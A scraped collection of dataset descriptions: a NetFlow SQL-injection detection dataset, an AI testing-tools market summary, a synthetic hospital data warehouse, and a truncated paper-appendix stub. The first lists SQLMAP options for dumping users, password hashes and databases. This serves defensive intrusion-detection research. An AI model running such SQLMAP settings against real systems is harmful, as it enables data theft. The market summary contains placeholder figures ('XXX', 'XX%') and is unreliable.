traffic ratio D1 Training 400,003 50% D2 Test 57,239 50% Infrastructure and implementation Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes) Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet). The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table. Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we ran MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Facebook
Twitterhttps://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy
Market Analysis for AI-Powered Testing Tools The global AI-powered testing tools market is projected to reach a value of USD XXX million by 2033, exhibiting a remarkable CAGR of XX% during the forecast period (2025-2033). The increasing adoption of agile software development methodologies, growing demand for continuous testing and quality assurance, and advancements in artificial intelligence and machine learning are the key factors driving market growth. Major players in the industry include Perforce Software, Applitools, Functionize, Testim, mabl, Parasoft, Autify, SeaLights, ReportPortal, ACCELQ, Testsigma, and Keysight. The market is segmented based on type (SaaS, PaaS, Other) and application (Large Enterprises, Small and Middle Enterprises). North America is the largest regional market, followed by Europe and Asia Pacific. The growing adoption of cloud-based testing solutions, increasing investment in automation, and the need for efficient and comprehensive testing solutions are further fueling market expansion. Restraints include the lack of skilled professionals, concerns regarding data security, and the high cost of implementation. However, advancements in AI and ML techniques, such as natural language processing and image recognition, are expected to create new growth opportunities in the AI-powered testing tools market. AI-powered Testing Tool Concentration & Characteristics This market is highly concentrated with a handful of large players holding a majority of the revenue. Key characteristics of innovation include the integration of AI and ML capabilities, automated test generation and scripting, and self-healing capabilities. Regulatory bodies are imposing stricter data privacy and security standards, impacting the adoption of AI-powered testing tools. Product substitutes exist in the form of traditional manual testing, which presents a challenge to market growth. End-user concentration is primarily centered around large enterprises with complex and diverse software portfolios. The M&A landscape is relatively active, with several acquisitions and collaborations taking place to strengthen product offerings.
Facebook
Twitterhttp://opendatacommons.org/licenses/dbcl/1.0/http://opendatacommons.org/licenses/dbcl/1.0/
MedSynora DW – A Comprehensive Synthetic Hospital Patient Data Warehouse
Overview MedSynora DW is a huge synthetic dataset designed to simulate the operation flow by adopting a patient-based approach in a large hospital. This dataset covers patient encounters, treatments, lab tests, vital signs, cost details and more over a full year of 2024. It is developed to support data science, machine learning, and business intelligence projects in the healthcare domain.
Project Highlights • Realistic Simulation: Generated using advanced Python scripts and statistical models, the dataset reflects realistic hospital operations and patient flows without using any real patient data. • Comprehensive Schema: The data warehouse includes multiple fact and dimension tables: o Fact Tables: Encounter, Treatment, Lab Tests, Special Tests, Vitals, and Cost. o Dimension Tables: Patient, Doctor, Disease, Insurance, Room, Date, Chronic Diseases, Allergies, and Additional Services. o Bridge Tables: For managing many-to-many relationships (e.g., doctors per encounter) and some other… • Synthetic & Scalable: The dataset is entirely synthetic, ensuring privacy and compliance. It is designed to be scalable – the current version simulates around 145,000 encounter records.
Data Generation • Data Sources & Methods: Data is generated using bunch of Py libraries. Highly customized algorithms simulate realistic patient demographics, doctor assignments, treatment choices, lab test results, and cost breakdowns etc.. • Diverse Scenarios: With over 300 diseases and thousands of treatment variations, along with dozens of lab and special tests, the dataset offers profoundly rich variability to support complex analytical projects.
How to Use This Dataset • For Data Modeling & ETL Testing: Import the CSV files into your favorite database system (e.g., PostgreSQL, MySQL, or directly into a BI tool like Power BI) and set up relationships as described in the accompanying documentation. • For Machine Learning Projects: Use the dataset to build predictive models related to patient outcomes, cost analysis, or treatment efficacy. • For Educational Purposes: Ideal for learning about data warehousing, star schema design, and advanced analytics in healthcare.
Final Note MedSynora DW offers a unique opportunity to experiment with a comprehensive, realistic hospital data warehouse without compromising real patient information. Enjoy exploring, analyzing, and building with this dataset – and feel free to reach out if you have any questions or suggestions. In particular, inconsistencies, deficiencies or suggestions about the dataset by experts in the field will contribute to other version improvements.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries: Appendix".
The appendix contains: